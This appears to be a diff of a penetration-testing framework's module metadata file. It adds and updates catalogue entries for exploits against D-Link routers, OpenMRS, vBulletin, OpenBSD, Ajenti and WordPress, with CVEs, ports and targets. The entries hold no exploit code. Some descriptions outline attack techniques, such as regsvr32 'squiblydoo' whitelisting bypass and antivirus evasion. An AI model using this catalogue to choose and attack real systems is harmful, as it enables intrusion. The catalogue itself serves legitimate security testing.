+    "description": "D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP\n        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in\n        /htdocs/cgibin), which is accessible without credentials.",
+    "references": [
+      "CVE-2019-17621",
+      "URL-https://medium.com/@s1kr10s/d94b47a15104"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "49152",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-13 13:18:43 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_subscribe_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_upnp_msearch_exec": {
    "name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
    "fullname": "exploit/linux/upnp/dlink_upnp_msearch_exec",
@@ -68433,7 +69108,7 @@
      "Drupal 7.0 - 7.31 (form-cache PHP injection method)",
      "Drupal 7.0 - 7.31 (user-post PHP injection method)"
    ],
-    "mod_time": "2018-01-03 23:10:16 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/exploits/multi/http/drupal_drupageddon.rb",
    "is_install_path": true,
    "ref_name": "multi/http/drupal_drupageddon",
@@ -68441,6 +69116,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "Drupageddon"
+      ]
    },
    "needs_cleanup": null
  },
@@ -72013,6 +72691,59 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/openmrs_deserialization": {
+    "name": "OpenMRS Java Deserialization RCE",
+    "fullname": "exploit/multi/http/openmrs_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-02-04",
+    "type": "exploit",
+    "author": [
+      "Nicolas Serra",
+      "mpgn",
+      "Shelby Pace"
+    ],
+    "description": "OpenMRS is an open-source platform that supplies\n        users with a customizable medical record system.\n\n        There exists an object deserialization vulnerability\n        in the `webservices.rest` module used in OpenMRS Platform.\n        Unauthenticated remote code execution can be achieved\n        by sending a malicious XML payload to a Rest API endpoint\n        such as `/ws/rest/v1/concept`.\n\n        This module uses an XML payload generated with Marshalsec\n        that targets the ImageIO component of the XStream library.\n\n        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java\n        8 and Java 9.",
+    "references": [
+      "CVE-2018-19276",
+      "URL-https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607",
+      "URL-https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization",
+      "URL-https://github.com/mpgn/CVE-2018-19276/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2019-12-04 12:17:35 +0000",
+    "path": "/modules/exploits/multi/http/openmrs_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/openmrs_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/openx_backdoor_php": {
    "name": "OpenX Backdoor PHP Code Execution",
    "fullname": "exploit/multi/http/openx_backdoor_php",
@@ -74637,7 +75368,7 @@
      "Splunk >= 5.0.1 / Linux",
      "Splunk >= 5.0.1 / Windows"
    ],
-    "mod_time": "2019-03-19 15:28:24 +0000",
+    "mod_time": "2019-11-26 15:38:34 +0000",
    "path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/splunk_upload_app_exec",
@@ -76359,6 +77090,68 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/vbulletin_widgetconfig_rce": {
+    "name": "vBulletin widgetConfig RCE",
+    "fullname": "exploit/multi/http/vbulletin_widgetconfig_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-23",
+    "type": "exploit",
+    "author": [
+      "unknown",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\n        parameter in an ajax/render/widget_php routestring POST request.",
+    "references": [
+      "CVE-2019-16759",
+      "URL-https://seclists.org/fulldisclosure/2019/Sep/31",
+      "URL-https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html"
+    ],
+    "platform": "PHP,Unix,Windows",
+    "arch": "cmd, php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Meterpreter (PHP In-Memory)",
+      "Unix (CMD In-Memory)",
+      "Windows (CMD In-Memory)"
+    ],
+    "mod_time": "2020-01-14 20:47:27 +0000",
+    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/visual_mining_netcharts_upload": {
    "name": "Visual Mining NetCharts Server Remote Code Execution",
    "fullname": "exploit/multi/http/visual_mining_netcharts_upload",
@@ -80009,7 +80802,8 @@
      "Casey Smith",
      "Trenton Ivey",
      "g0tmi1k",
-      "bcoles <bcoles@gmail.com>"
+      "bcoles <bcoles@gmail.com>",
+      "phra"
    ],
    "description": "This module quickly fires up a web server that serves a payload.\n        The provided command which will allow for a payload to download and execute.\n        It will do it either specified scripting language interpreter or \"squiblydoo\" via regsvr32.exe\n        for bypassing application whitelisting. The main purpose of this module is to quickly establish\n        a session on a target machine when the attacker has to manually type in the command:\n        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.\n        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege\n        escalations supplied by Meterpreter.\n\n        When using either of the PSH targets, ensure the payload architecture matches the target computer\n        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.\n\n        Regsvr32 uses \"squiblydoo\" technique for bypassing application whitelisting.\n        The signed Microsoft binary file, Regsvr32, is able to request an .sct file\n        and then execute the included PowerShell command inside of it.\n\n        Similarly, the pubprn target uses the pubprn.vbs script to request and\n        execute a .sct file.\n\n        Both web requests (i.e., the .sct file and PowerShell download/execute)\n        can occur on the same port.\n\n        \"PSH (Binary)\" will write a file to the disk, allowing for custom binaries\n        to be served up to be downloaded and executed.",
    "references": [
@@ -80018,9 +80812,10 @@
      "URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
      "URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
      "URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html",
-      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
+      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
+      "URL-https://iwantmore.pizza/posts/amsi.html"
    ],
-    "platform": "Linux,PHP,Python,Windows",
+    "platform": "Linux,OSX,PHP,Python,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": [
@@ -80036,9 +80831,10 @@
      "Regsvr32",
      "pubprn",
      "PSH (Binary)",
-      "Linux"
+      "Linux",
+      "Mac OS X"
    ],
-    "mod_time": "2019-07-12 23:16:43 +0000",
+    "mod_time": "2020-01-09 15:02:04 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -80440,6 +81236,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_openbsd/local/dynamic_loader_chpass_privesc": {
+    "name": "OpenBSD Dynamic Loader chpass Privilege Escalation",
+    "fullname": "exploit/openbsd/local/dynamic_loader_chpass_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-11",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n        dynamic loader (CVE-2019-19726).\n\n        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n        environment variable when set with approximately `ARG_MAX` colons.\n\n        This can be abused to load `libutil.so` from an untrusted path,\n        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n        executable, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        OpenBSD 6.1 (amd64); and\n        OpenBSD 6.6 (amd64)",
+    "references": [
+      "CVE-2019-19726",
+      "EDB-47780",
+      "URL-https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726",
+      "URL-https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt",
+      "URL-https://www.openwall.com/lists/oss-security/2019/12/11/9",
+      "URL-https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass",
+      "URL-https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig"
+    ],
+    "platform": "BSD,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-12-22 08:46:43 +0000",
+    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_osx/afp/loginext": {
    "name": "AppleFileServer LoginExt PathName Overflow",
    "fullname": "exploit/osx/afp/loginext",
@@ -83540,7 +84382,7 @@
    ],
    "platform": "Unix",
    "arch": "cmd",
-    "rport": 80,
+    "rport": 22,
    "autofilter_ports": [
      80,
      8080,
@@ -84453,7 +85295,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -84703,6 +85545,55 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/webapp/ajenti_auth_username_cmd_injection": {
+    "name": "Ajenti auth username Command Injection",
+    "fullname": "exploit/unix/webapp/ajenti_auth_username_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-14",
+    "type": "exploit",
+    "author": [
+      "Jeremy Brown",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in Ajenti == 2.1.31.\n        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.",
+    "references": [
+      "EDB-47497"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Ajenti == 2.1.31"
+    ],
+    "mod_time": "2019-11-20 19:09:24 +0000",
+    "path": "/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/ajenti_auth_username_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/arkeia_upload_exec": {
    "name": "Western Digital Arkeia Remote Code Execution",
    "fullname": "exploit/unix/webapp/arkeia_upload_exec",
@@ -89929,70 +90820,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_unix/webapp/webmin_backdoor": {
-    "name": "Webmin password_change.cgi Backdoor",
-    "fullname": "exploit/unix/webapp/webmin_backdoor",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2019-08-10",
-    "type": "exploit",
-    "author": [
-      "AkkuS",
-      "wvu <wvu@metasploit.com>"
-    ],
-    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
-    "references": [
-      "CVE-2019-15107",
-      "URL-http://www.webmin.com/exploit.html",
-      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
-      "URL-https://blog.firosolutions.com/exploits/webmin/",
-      "URL-https://github.com/webmin/webmin/issues/947"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64",
-    "rport": 10000,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (Unix In-Memory)",
-      "Automatic (Linux Dropper)"
-    ],
-    "mod_time": "2019-08-21 17:42:54 +0000",
-    "path": "/modules/exploits/unix/webapp/webmin_backdoor.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/webmin_backdoor",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_unix/webapp/webmin_show_cgi_exec": {
    "name": "Webmin /file/show.cgi Remote Command Execution",
    "fullname": "exploit/unix/webapp/webmin_show_cgi_exec",
@@ -91165,6 +91992,56 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/wp_plainview_activity_monitor_rce": {
+    "name": "Wordpress Plainview Activity Monitor RCE",
+    "fullname": "exploit/unix/webapp/wp_plainview_activity_monitor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-08-26",
+    "type": "exploit",
+    "author": [
+      "LydA(c)ric LEFEBVRE",
+      "Leo LE BOUTER"
+    ],
+    "description": "Plainview Activity Monitor Wordpress plugin is vulnerable to OS\n          command injection which allows an attacker to remotely execute\n          commands on underlying system. Application passes unsafe user supplied\n          data to ip parameter into activities_overview.php.\n          Privileges are required in order to exploit this vulnerability.\n\n          Vulnerable plugin version: 20161228 and possibly prior\n          Fixed plugin version: 20180826",
+    "references": [
+      "CVE-2018-15877",
+      "EDB-45274"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WordPress"
+    ],
+    "mod_time": "2019-11-28 20:13:21 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/wp_platform_exec": {
    "name": "WordPress Platform Theme File Upload Vulnerability",
    "fullname": "exploit/unix/webapp/wp_platform_exec",
@@ -104999,7 +105876,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -105082,7 +105959,7 @@
    "targets": [
      "ACDSee FotoSlate 4.0 Build 146"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_fotoslate_string",
@@ -105123,7 +106000,7 @@
    "targets": [
      "ACDSee 9.0 (Build 1008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_xpm",
@@ -105206,7 +106083,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -105247,7 +106124,7 @@
    "targets": [
      "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_collectemailinfo",
@@ -105291,7 +106168,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_cooltype_sing",
@@ -105337,7 +106214,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_button",
@@ -105381,7 +106258,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
@@ -105425,7 +106302,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
@@ -105468,7 +106345,7 @@
    "targets": [
      "Adobe Reader Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_geticon",
@@ -105511,7 +106388,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
@@ -105556,7 +106433,7 @@
      "Adobe Reader v9.0.0 (Windows XP SP3 English)",
      "Adobe Reader v8.1.2 (Windows XP SP2 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_jbig2decode",
@@ -105602,7 +106479,7 @@
    "targets": [
      "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_libtiff",
@@ -105647,7 +106524,7 @@
      "Adobe Reader Windows English (JS Heap Spray)",
      "Adobe Reader Windows German (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_media_newplayer",
@@ -105784,7 +106661,7 @@
    "targets": [
      "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_reader_u3d",
@@ -105872,7 +106749,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_u3d_meshdecl",
@@ -105913,7 +106790,7 @@
    "targets": [
      "Adobe Reader v8.1.2 (Windows XP SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_utilprintf",
@@ -106004,7 +106881,7 @@
    "targets": [
      "Universal Salamander 2.5"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/altap_salamander_pdb",
@@ -106091,7 +106968,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aol_phobos_bof",
@@ -106134,7 +107011,7 @@
    "targets": [
      "Windows XP SP3 with DEP bypass"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/apple_quicktime_pnsize",
@@ -106312,7 +107189,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/audio_wkstn_pls",
@@ -106781,7 +107658,7 @@
    "targets": [
      "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ca_cab.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ca_cab",
@@ -106866,7 +107743,7 @@
    "targets": [
      "CCMPlayer 1.5"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ccmplayer_m3u_bof",
@@ -107179,7 +108056,7 @@
      "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
      "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
    ],
-    "mod_time": "2018-12-11 07:55:20 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cyberlink_lpp_bof",
@@ -107265,7 +108142,7 @@
    "targets": [
      "Cytel Studio 9.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -107478,7 +108355,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/djvu_imageurl",
@@ -107517,7 +108394,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-02-01 10:05:50 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/dupscout_xml",
@@ -107648,7 +108525,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/emc_appextender_keyworks",
@@ -107907,7 +108784,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fatplayer_wav",
@@ -107953,7 +108830,7 @@
    "targets": [
      "Free Download Manager 3.0 (Build 844)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fdm_torrent",
@@ -107999,7 +108876,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/feeddemon_opml",
@@ -108042,7 +108919,7 @@
      "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
      "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -108085,7 +108962,7 @@
    "targets": [
      "Foxit Reader 3.0 Windows XP SP2"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_launch",
@@ -108221,7 +109098,7 @@
    "targets": [
      "Windows XP SP3 EN"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/free_mp3_ripper_wav",
@@ -108262,7 +109139,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -108388,7 +109265,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
@@ -108431,7 +109308,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
